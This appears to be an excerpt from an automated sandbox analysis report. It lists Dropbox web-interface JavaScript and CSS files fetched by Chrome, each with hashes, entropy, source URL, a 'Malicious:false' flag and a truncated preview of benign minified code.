                                                    Preview:define(["require","exports","./e_file_viewer_static_scl_page_folder","react","./c_action_plugins_conversion_action_conditions","./c_action_plugins_download_action_definition","./c_file_viewer_action_plugins_titlebar_button","./c_action_bar_action_bar_strings","./c_file_viewer_preview_tour_preview_tour_configs","./c_dig-illustrations_spot_passcode-lock","./c_cloud_docs_constants","./c_pap-events_docsend_view_docsend_hub_entry_button","./e_edison","./c_ts_utils","./e_core_exception","./c_api_v2_routes_folders_info_provider","./c_core_i18n","./c_pap-events_sign_save_signature_doc","./c_src_sink_index","./c_dig-icons_assets_ui-icon_line_rewind"],(function(e,t,n,i,o,r,s,a,c,l,d,_,u,f,p,S,g,h,w,m){"use strict";function O(e){return e&&e.__esModule?e:{default:e}}var E=O(i);function v(e){return function(e){return void 0!==e.ext}(e)?e.ext:function(e){return void 0!==e.fq_path}(e)?"."+n.file_extension(n.filename(e.fq_path)):function(e){return void 0!==e.filename}(e)?"."+n.file_extension(e.filenam
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (677)
                                                    Category:downloaded
                                                    Size (bytes):734
                                                    Entropy (8bit):4.979854890512919
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D266ED83C9C79E69E2DA2B155EA9E587
                                                    SHA1:17852CD4341556A50FCCA21D357F44124EADF702
                                                    SHA-256:C4F6518A02853C2D71E2407727DC8F1F65420614CB5DDAC241BC065AFF3B252F
                                                    SHA-512:BC735E8A3EE4A279F2A37FBDE2C2CD74C65DEEE586DF25CDFC879C6BBCBC5F28C0E014B0189B7A76EE5920CDB6CAFC9C18552A1A6A1CE098D2EBB48A105DD06B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_flux_dispatcher-vfl0mbtg8.js
                                                    Preview:define(["exports","./c_flux_action_type","./c_api_v2_routes_folders_info_provider","./e_core_exception"],(function(t,e,n,i){"use strict";var r=e.Dispatcher_1;let s=null;const c=new class extends r{dispatch(t){n.assert(null!=t.type,"Invariant error: cannot dispatch action without 'type' property."),n.assert(null===s,`Invariant error: cannot dispatch ${t.type} while also dispatching ${s}.`),s=t.type;try{"function"==typeof this.dispatch_begin&&this.dispatch_begin();try{return super.dispatch({action:t})}catch(t){return i.reportException({err:t}),console.error(t)}finally{"function"==typeof this.dispatch_end&&this.dispatch_end()}}finally{s=null}}};t.dispatcherSingleton=c}));.//# sourceMappingURL=c_flux_dispatcher.js-vflGiQyhY.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2417)
                                                    Category:dropped
                                                    Size (bytes):2507
                                                    Entropy (8bit):5.318832271819978
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A3E3260452BFF080DCCA8B4358D1D9DF
                                                    SHA1:E11686C6F1DDF798D4083DBBA797DE8FD1D7F60C
                                                    SHA-256:39B0D5845A68F43B6DFD3639D2427878D2C893C8BC4BD388ED7BD8AE94FEBD0B
                                                    SHA-512:CC74BCB3AEEE7CB824A6C71CA1AEC767974C0682D73A6BB3364AF29E26BB44D04699117C0477BA7A7615468C3D0C07C34F7443A236C9A1EE5DB7E30FE0C74F8B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var n=l(t);e.FileExplorerLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"m10.875 7-1.5-2H4v11.75A2.25 2.25 0 0 0 6.25 19h12a2.249 2.249 0 0 0 2.25-2.25V7h-9.625Zm.625 10.5V16H13v1.5h-1.5Zm3 0v-3H10v3H8.5V13H16v4.5h-1.5Zm4.5-.75a.75.75 0 0 1-.75.75h-.75v-6H7v6h-.75a.75.75 0 0 1-.75-.75V6.5h3.125l1.5 2H19v8.25Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.FinderLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M4 4.5v15h15.5v-15H4ZM5.5 6H11v7h2.983c-.085 1.322-.829 2-2.233 2-1.404 0-2.15-.678-2.233-2H8.01c.1 2.165 1.513 3.5 3.74 3.5a4.033 4.033
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (47052)
                                                    Category:downloaded
                                                    Size (bytes):47123
                                                    Entropy (8bit):3.97309516530154
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3F4C5E192C36FE591EDA0493A4B1D7E5
                                                    SHA1:DC99AFC166CD28352E268F4E2AA0708CC970A79B
                                                    SHA-256:6A590280665C5FEA629347206A87365A4C062A5848BA03180FA76F9E1BFEDC4B
                                                    SHA-512:3D28732A375212765FA9FBDE84C2B755AA8C05BB96814C3C934A4119DD190819835B4AD78953009F668F1EFBC996B995B06156EDCAFDB64E2E905381A6D8862A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_components_over-quota-modal-vflP0xeGS.js
                                                    Preview:define(["exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,t,c,a,l,r,o,n,s,m,i,d,z,u,_,h,v,p){"use strict";function f(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var a=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(t,c,a.get?a:{enumerable:!0,get:function(){return e[c]}})}})),t.default=e,Object.freeze(t)}var g=f(t);const M=({altText:e,inverse:t,...c})=>{const a="dig-Illustration dig-Illustration-spot"+(t?" dig-Illustration--inverse":"");return g.crea
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (8497)
                                                    Category:downloaded
                                                    Size (bytes):8498
                                                    Entropy (8bit):4.901767907286479
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:30EBE89ADA4569020889569E3700FD6D
                                                    SHA1:9CC0DB62BCF4E8688461CF10903FC686375005E2
                                                    SHA-256:9189666CBA8E7FEEE41224C2231C5BEBB265652BE0A4FFA623F7504F9F6C417F
                                                    SHA-512:35C8BD4A8F292896A5ADB646B5446791F0B7E8BA013A3EEF8DE0ED0CB38AEE8CEDB7C5C62F324ED4EF8797E1898D0799C5AB17C229801D4D5DBE104A93CA144D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/google_one_tap-vflMOvomt.css
                                                    Preview:#credential_picker_iframe{z-index:10002 !important}.shared-link-signup-page #credential_picker_container,.shared-link-signup-page .one-tap-tos-modal-v1{top:var(--ib-preview-toolbar-top-offset, 20px)}.file-transfers-page-body #credential_picker_container{top:calc( var(--dwg-nav__height--universal, 48px) + var(--dwg-spacing__unit--2, 16px) - 6px)}.warp-page #credential_picker_container{top:calc( var(--dwg-nav__height--universal, 48px) + var(--dwg-spacing__unit--2, 16px) - 6px)}.shared-link-file-page #credential_picker_container,.shared-link-file-page .one-tap-tos-modal-v1{top:calc(var(--titlebarHeight, 64px) + var(--dwg-spacing__unit--2, 16px) - 6px);right:calc(56px + var(--dwg-spacing__unit--2, 16px) - 6px)}.shared-link-folder-page #credential_picker_container,.shared-link-folder-page .one-tap-tos-modal-v1,.scl-folder-page #credential_picker_container,.scl-folder-page .one-tap-tos-modal-v1{top:calc(var(--titlebarHeight, 64px) + var(--dwg-spacing__unit--2, 16px) - 6px)}.login-or-register
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2075)
                                                    Category:dropped
                                                    Size (bytes):2138
                                                    Entropy (8bit):5.121683711923096
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:16046CC4D0149A0F9A9387069DAB4F15
                                                    SHA1:67EB211151A0ED12E2BDD0D478FC9C5CE143FF8C
                                                    SHA-256:7B4D8886BA0668542DCA83870EF185EF3D2EE07851AE86B359AC0061715BC841
                                                    SHA-512:3CAC434C0CD70F3E6C44B508C70C24915C0EB3C4457311CD119D2DACB7C658D4B498F8FA0E2B081953C92F7791D25100CF7937F618F064D5775E3B8BE0B1D43A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(t){"use strict";t.KMPSearch=class{constructor(t,e){this.segments=[],this.searchResult=new Map,this.searchOptions={parseText:t=>t,shouldAddSyntheticSpace:()=>!0},this.nextHitIndex=0,this._hitCount=0,e&&(this.searchOptions={...this.searchOptions,...e}),this.getSegments=t}get hitCount(){return this._hitCount}makePrefixJumps(t){const e=new Array(t.length+1);let s=0;e[0]=-1;for(let h=1;h<e.length-1;h++){if(t[h]===t[s])e[h]=e[s];else for(e[h]=s;s>=0&&t[h]!==t[s];)s=e[s];s++}return e[e.length-1]=s,e}addMatch(t,e,s,h,n){var i,r,a,c;if(this.searchResult.has(t)||this.searchResult.set(t,new Map),(null===(i=this.searchResult.get(t))||void 0===i?void 0:i.has(e))||null===(r=this.searchResult.get(t))||void 0===r||r.set(e,new Set),null===(c=null===(a=this.searchResult.get(t))||void 0===a?void 0:a.get(e))||void 0===c||c.add({startingCharIndex:Math.max(s-h,0),endingCharIndex:s,hitNumber:this.nextHitIndex}),s<h){const i=0===e?t-1:t,r=0===e?this.segments[i].chunks.length-1:e-1
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (753)
                                                    Category:downloaded
                                                    Size (bytes):808
                                                    Entropy (8bit):5.070905271130902
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9CC6A774DA2AC27A752A9FB32F6DA9BD
                                                    SHA1:7DA574B22FA3E61D2CCD5DAE0A37B785AAC46167
                                                    SHA-256:3E7D06A435F9258F3E2FE3F2F14E501B509C177F3A015904ED1276A0DB8B9997
                                                    SHA-512:F6DF1C45A4AB1F06F30D0B40CEF3159BF77F6D97C4F517C0E024F8EF6BC76DE1456B075A61CA15D27596CFD68D4F8AB4B5323AC6D1540FFBA66F533DD8722588
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_previews_util-vflnMandN.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_api_v2_routes_folders_info_provider"],(function(e,i,r){"use strict";function t(e,i){return function(e,i){const r={};return r._subject_uid=String(i),e.updateQuery(r)}(new r.URI({path:"/history"+e}),i.id)}const o=[i.PreviewType.Archive,i.PreviewType.Audio,i.PreviewType.CloudDoc,i.PreviewType.Excel,i.PreviewType.HTML,i.PreviewType.Image,i.PreviewType.Linkfile,i.PreviewType.Other,i.PreviewType.SsrDoc,i.PreviewType.RawHTML,i.PreviewType.Restricted,i.PreviewType.Video,i.PreviewType.Doc,i.PreviewType.Photo,i.PreviewType.Text];e.VALID_PREVIEW_TYPES=o,e.redirectToVersionHistory=function(e,r){i.UserActivityLogger.log("web","view_version_history");const o=t(e,r);i.redirect(o.toString())}}));.//# sourceMappingURL=c_previews_util.js-vflE62nl3.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2306)
                                                    Category:downloaded
                                                    Size (bytes):2376
                                                    Entropy (8bit):5.289418776726657
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:12858E762F92A8A1EBF9F1639712B5DF
                                                    SHA1:EC494CA2E02A9D1D74798E06260AD96B35FE238E
                                                    SHA-256:8FC2E7398B1DB79B2F23685F856522597AF6AF82C19C4DA7DFF8D4872B64F9AF
                                                    SHA-512:828519317657FF4403DA59D803B6C48B57E9FAC03A3308BEB697B8AA4E5EFAA231E884D1C7815429616A17B2DD90C27872CE7FCBEAC633048DF0F82D908B35AD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_pap_logger_utils-vflEoWOdi.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(e,r){"use strict";const i={[r.SDKPreviewSurface.INBAND_SHARE]:"shared_link_in_band",[r.SDKPreviewSurface.SHARED_CONTENT_LINK]:"shared_link_out_of_band",[r.SDKPreviewSurface.SHARED_LINK]:"shared_link_out_of_band",[r.SDKPreviewSurface.BROWSE]:"browse",[r.SDKPreviewSurface.SEARCH]:"search",[r.SDKPreviewSurface.SHARED_LINK_EMBED]:"shared_link_embed",[r.SDKPreviewSurface.VERSION_HISTORY]:"version_history",[r.SDKPreviewSurface.HOME]:"home",[r.SDKPreviewSurface.HELLOSIGN]:"hellosign",[r.SDKPreviewSurface.RECENTS]:"recents",[r.SDKPreviewSurface.STARRED]:"starred",[r.SDKPreviewSurface.STANDALONE_PREVIEW]:"standalone_preview",[r.SDKPreviewSurface.PHOTOS]:"photos",[r.SDKPreviewSurface.SHARED_COLLECTION]:"shared_collection",[r.SDKPreviewSurface.TRANSFER]:"transfer",[r.SDKPreviewSurface.FILE_LOCKING]:"file_locking",[r.SDKPreviewSurface.BACKUP]:"backup",[r.SDKPreviewSurface.UNKNOWN]:"unknown_surface",[r.SDKPreviewSurface.QUICK_VIE
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (34712)
                                                    Category:downloaded
                                                    Size (bytes):34808
                                                    Entropy (8bit):5.61806017358316
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0A5FB033BA41B0572371C2E5B860858B
                                                    SHA1:7A86D1D4343C942DA3696ECA888E9D843301B5CC
                                                    SHA-256:2F72138F9169BBC342B52265B039A2C4B3783884565025E586364E24298C622B
                                                    SHA-512:251E76B203DF7CF0AD4E6F8F2FE94CDDD14F1D65F8232F1F6BE15B602CACFEF6FEB51B4B2593D89D09F4ED9C3FC2B1E1DF5391ED00E39EE3D75D85B557937707
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_flows_conversions_conversion_actions-vflCl-wM7.js
                                                    Preview:define(["exports","./c_flows_conversions_convert","./c_core_i18n","./c_flows_utils_browse_logger","./c_flows_redux_reducer","./c_flows_constants","./c_flows_redux_store","./c_flows_redux_actions","./c_flows_conversions_utils","./c_dig-icons_assets_ui-icon_line_file","./c_dig-icons_assets_ui-icon_line_star","./c_dig-icons_assets_ui-icon_line_video","./c_dig-logos_src_glyph_fss","react","./c_spectrum_svg_icon_bundle","./c_action_plugins_download_action_button","./e_file_viewer_static_scl_page_folder","./c_shared_components_templates_modal_template","./c_ts_utils","./c_cloud_docs_constants","./c_dig-icons_assets_ui-icon_line_upload","./c_gdd_migration_ui_utils","./c_icon_shortcuts_icon","./c_cloud_docs_hooks"],(function(e,t,o,n,s,i,a,l,r,c,u,d,f,g,_,p,h,m,S,v,E,M,F,I){"use strict";function T(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(o){if("default"!==o){var n=Object.getOwnPropertyDescriptor(e,o);Object.defineProperty(t,o,n.get?n:{e
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3485)
                                                    Category:dropped
                                                    Size (bytes):3567
                                                    Entropy (8bit):5.409917383999534
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:18A165CAC660250BC658C75E0BC52243
                                                    SHA1:2415BD3C2C8E36D8F52E730DED8892FBDB10FB98
                                                    SHA-256:C5954A1643ABB6366EB9484A720990BF291502A6B107DEFF57BAF1C26614FD39
                                                    SHA-512:85EDE080FBF63B1914030A6AE54B369EDCCAF5D832B0A9A44A7B5AD51185B8CC407B7CB0E7F513FD3ED71900705A515D591B1CF134FA6AC103B0A91FB9AAD3A0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","./c_folder_dialog_constants","./c_folder_dialog_api","./e_file_viewer_static_scl_page_folder"],(function(e,o,t,i,_){"use strict";var s,r,a;o.ModalName=void 0,(s=o.ModalName||(o.ModalName={})).MOVE="move",s.COPY="copy",s.NEW_FOLDER="new_folder",s.UPLOAD="upload",s.SEARCH_FILTER="search_filter",s.KEYBOARD_SHORTCUTS="keyboard_shortcuts",s.EXPORT_LEGAL_HOLD="export_legal_hold",s.FOLDER_OVERVIEW_PIN_TO="folder_overview_pin_to",s.CLOUD_DOCS_CREATE="cloud_docs_create",s.DELETED_FILES_FILTER="deleted_files_filter",s.HOME_NEW_FOLDER="home_new_folder",s.FILE_TRANSFERS_SELECT_FOLDER_SAVE_TO_DROPBOX="file_transfers_select_folder_save_to_dropbox",s.NEW_FILE_WITH_SELECT_PATH="new_file_with_select_path",s.NEW_FOLDER_WITH_SELECT_PATH="new_folder_with_select_path",s.IMPORT_FROM_GDRIVE_WITH_SELECT_PATH="import_from_gdrive_with_select_path",o.ModalEventName=void 0,(r=o.ModalEventName||(o.ModalEventName={})).SHOW="show",r.ERROR="error",r.SUCCESS="success",r.DATA_LOADED="data-l
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (8357)
                                                    Category:dropped
                                                    Size (bytes):8447
                                                    Entropy (8bit):5.192808807499292
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:691A498CAC0BA520216562A11438D542
                                                    SHA1:464E080A3500CEFA9F0159100E0782C19642DEA6
                                                    SHA-256:279255FEAF53FE2A1AEBF696B37DFED5265C81DE08F82FB177712E4C9E5C2ED5
                                                    SHA-512:0CD34913D5B5F20EAA53F1AF6A68FA30F8A4C868C2B1FCD89B5C0E6586426ADC6A0205DEA6258398DADF07104C54CA554A67E895CB45F113DA5939D5A6381CC4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./c_file_transfers_async_browse_entry_point_onboarding_modal_async","./e_file_viewer_static_scl_page_folder","./c_sharing_async_share_modal_util","./e_core_exception","./c_ts_utils","./e_edison","./e_data_modules_stormcrow","./c_src_bindings_provider","./c_views_copy_link_mini_modal_after_display_utils","./c_shareme24_browse_integration_logger","./c_api_v2_routes_folders_info_provider","./c_src_common_constants","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_core_i18n","./c_src_sink_index","./c_lodash","metaserver/static/js/langpack","./c_upload_kit_lib_types","./c_browse_models","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_datatypes_sharing_account-metadata","./c_shared_with_redux_store","./c_reduxjs_toolkit_redux-toolkit","./c_react-use_misc_util","./c_browse_data_selectors","./c_tagging_utils","./c_search_
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):639
                                                    Entropy (8bit):5.239448849095377
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8912435717962B83C760125A6137581C
                                                    SHA1:BD974135B5D4FE2D736B82035AB9B838D104AB43
                                                    SHA-256:E0892D4B06986A5574118D7EAEF9CFB7A99CB63B1B47AA04E389242E4593FB36
                                                    SHA-512:8FD81A435610C0D35430BE756F8164C0AD8A44117CAA9DA731A03F9B7B8BD3173E30E5A25EBFADCA5B7383A50B36ACD8886F5211F5E4E12EC07FAE0BBD1FB4EC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/content-icons-vfliRJDVx.css
                                                    Preview:/** @generated -- This file is automatically synced from @dropbox/dig-content-icons@5.2.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/...dig-ContentIcon{box-sizing:border-box}.dig-ContentIcon--overSubtle{--dig-color__fileicon__container:var(--dig-color__background__base)}.dig-ContentIcon--hasNoBackground{--dig-color__fileicon__container:transparent;--dig-color__fileicon__shadow:transparent}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5250)
                                                    Category:downloaded
                                                    Size (bytes):5325
                                                    Entropy (8bit):5.157116416700006
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9B6AE06EC85145B5E41861C40B094D05
                                                    SHA1:FB80DB8F91F71579E44AA5AD9947780F0DD3DCCD
                                                    SHA-256:C7EC9A0B9DBA26BD899E449FBA6018A83365B97A36CEB8808EE169C664FB464A
                                                    SHA-512:9570059CBE7DA641AC53199BEB3EB1B21BEFFC264FDD3BBBDCD0559488013D0AF05DD28E2BEF2E4815122387236AAB73D7EF7AB52866CA05469EECCA61201827
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_helpers_hooks_component-did-mount-vflm2rgbs.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_atoms_dwg-box_index"],(function(e,t,a,l){"use strict";function o(e){return e&&e.__esModule?e:{default:e}}var r=o(t);const n=r.default.forwardRef((({typographyType:e,children:t,size:o,fontStyle:n,weight:i,color:s="standard",isRichText:f=!1,unorderedNestedOrderedLists:g=!1,blueLinks:y=!1,isTextWrapPrettyBalance:h=!1,tagName:p,className:m,...u},c)=>{const d=((e,t,a,l)=>{switch(e){case"display":return((e,t="normal")=>{switch(e){case"xlarge":return{fontFamily:"sharp-grotesk-23-book",fontSize:{mobile:32,tablet:48,desktop:72},fontStyle:t,fontWeight:"regular",lineHeight:{mobile:"120%",tablet:"110%"}};case"large":return{fontFamily:"sharp-grotesk-23-book",fontSize:{mobile:32,tablet:40,desktop:48},fontWeight:"regular",fontStyle:t,lineHeight:{mobile:"120%",tablet:"110%"}};case"small":return{fontFamily:"sharp-grotesk-23-book",fontSize:{mobile:24,tablet:32},fontWeight:"regular",fontStyle:t,lineHeight:"120%"};case"xsmall":return{
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (23377)
                                                    Category:downloaded
                                                    Size (bytes):23448
                                                    Entropy (8bit):5.225717036043149
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2997628B83339EB71CAEE14539F53BD7
                                                    SHA1:71B9F68CB4E511D77E31D9E8C84E3BAAF5CEEBDD
                                                    SHA-256:7170474A7DAD2F8464F1630FD9063A581317EBF3F754D9C0A2A998D26036DB42
                                                    SHA-512:E39FF65C1A1AB2E895C2F46C59CB91402B291AE838128C5E6716B393103CB44E1F042849BF2DF09C9859752788C7F12E84DE76D9D00CC86AD235B9D9ABC49D79
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_collection_viewer-vflKZdii4.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_lodash","./c_api_v2_routes_folders_info_provider","./c_file_viewer","./c_queries_utils_preview_metadata","./e_core_exception","./c_react-redux_hooks_useDispatch","./c_core_i18n","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_portable_delete","./c_action_bar_action_bar_strings","./c_portable_delete_strings","./c_files_view_file_actions_api_v2","./c_portable_delete_snackbars","./c_files_view_file_actions_snackbars","./c_action_plugins_conversion_action_conditions","./c_portable_rename_snackbars","./c_file_actions_strings","./c_referrer_cleansing_redirect","./c_security_csrf_hmac","./c_security_crypto","./c_file_viewer_c
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1042)
                                                    Category:downloaded
                                                    Size (bytes):1125
                                                    Entropy (8bit):5.314336724912372
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:599D2ACC481FCEDC9B8A2378DC3B92CE
                                                    SHA1:39F13F8C216C1BAD4904E268FD9C4412F22BB210
                                                    SHA-256:3772AE2DB67ECB17008D7DB11B622DA9C3E444EA27994139CC5D89E98F0CC834
                                                    SHA-512:5727682075C6A85F82CCD3D079E73C011AF085A378EC774499A420D7E4AE3AEA2D86F6D885C3A97F34F4DB8B1A87B58F253E54958D2681A3DFC341AFD66813DA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_action_plugins_download_action_definition-vflWZ0qzE.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_action_plugins_conversion_action_conditions"],(function(e,S,i){"use strict";const r=[S.SDKPreviewSurface.BACKUP,S.SDKPreviewSurface.BROWSE,S.SDKPreviewSurface.FILE_LOCKING,S.SDKPreviewSurface.HELLOSIGN,S.SDKPreviewSurface.HOME,S.SDKPreviewSurface.INBAND_SHARE,S.SDKPreviewSurface.PHOTOS,S.SDKPreviewSurface.RECENTS,S.SDKPreviewSurface.SEARCH,S.SDKPreviewSurface.SHARED_CONTENT_LINK,S.SDKPreviewSurface.SHARED_LINK,S.SDKPreviewSurface.SHARED_LINK_EMBED,S.SDKPreviewSurface.STANDALONE_PREVIEW,S.SDKPreviewSurface.STARRED,S.SDKPreviewSurface.TRANSFER,S.SDKPreviewSurface.UNKNOWN,S.SDKPreviewSurface.VERSION_HISTORY,S.SDKPreviewSurface.LOW_DISTRACTION_VIEW],a={filterValidFile:e=>!i.isLiveFile(e)||i.isPnmLinkNodeSelected(e)||i.isCloudDoc(e)?void 0:e,filterValidUser:e=>({user:e}),shouldShowForPreviewSurface:i.filterSurfaceIn(r),shouldShowForPreviewType:i.alwaysShow};e.downloadActionConditions=a,e.isDownloadPluginEnabled=(e,i)=>!S.isShar
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (53394)
                                                    Category:downloaded
                                                    Size (bytes):336618
                                                    Entropy (8bit):5.388732971352219
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A204665EE0804AEB239115BEDD26E48B
                                                    SHA1:ED6D27461121B53DD7E5D2B7F0ED7F0EB6E88F43
                                                    SHA-256:9B4BB0FDC683F1C097BC2F9981FAB87C9821157B616D358BD800247EF2ACB62A
                                                    SHA-512:03760AE8819E1DCDA3F462B5EA362D6608842668A1B0098BF181B63A5FD107BAA51CC205A4AB0315AAD8920CC43829FB3FB5139842E7F627AD603315EB41AA8A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer-vflogRmXu.js
                                                    Preview:define(["require","exports","react","./e_file_viewer_static_scl_page_folder","./e_data_modules_stormcrow","./c_portable_delete","./c_portable_delete_snackbars","./c_action_plugins_conversion_action_conditions","./c_core_i18n","./c_files_view_file_actions_api_v2","./c_portable_rename_snackbars","./c_referrer_cleansing_redirect","./c_file_viewer_common_show_auth_modal","./c_core_logging_video","./c_api_v2_routes_folders_info_provider","./c_pap-events_sign_save_signature_doc","./c_file_viewer_preview_logger","./c_file_viewer_pap_logger_utils","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./c_photo-editor_plugin_show-edit-plugin","./c_keymaster","./e_core_exception","./e_edison","./c_file_viewer_hooks_usePrevious","./c_core_riviera_transcripts","./c_core_utils_is_text_preview_on","./c_lodash","./c_file_viewer_logging_timing","./c_core_logging_actions","./c_file_viewer_preview_archive_utils","./c_core_utils_uuid","./c_src_common_filepath","./c_file_viewer_keyboard_b
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2524)
                                                    Category:dropped
                                                    Size (bytes):2608
                                                    Entropy (8bit):5.162011067184225
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5231E07BEE7137A668C6FC3C2DB15164
                                                    SHA1:B34B6C025F268C352B6351E28DD5BBCB8D2D37AF
                                                    SHA-256:08722A2696973305D63F7F38D9325A8665B40D4413CADD11D1485972AF4D82DF
                                                    SHA-512:18C408ADAF4368A511EA0C921F24C467EF67017296CC8651C0142DC2B2EB95F40D056007030D9189FC894B6941A6F54E468FFBD9C90A961151CA67439501A3C8
                                                    Malicious:false
                                                    Reputation:unknown
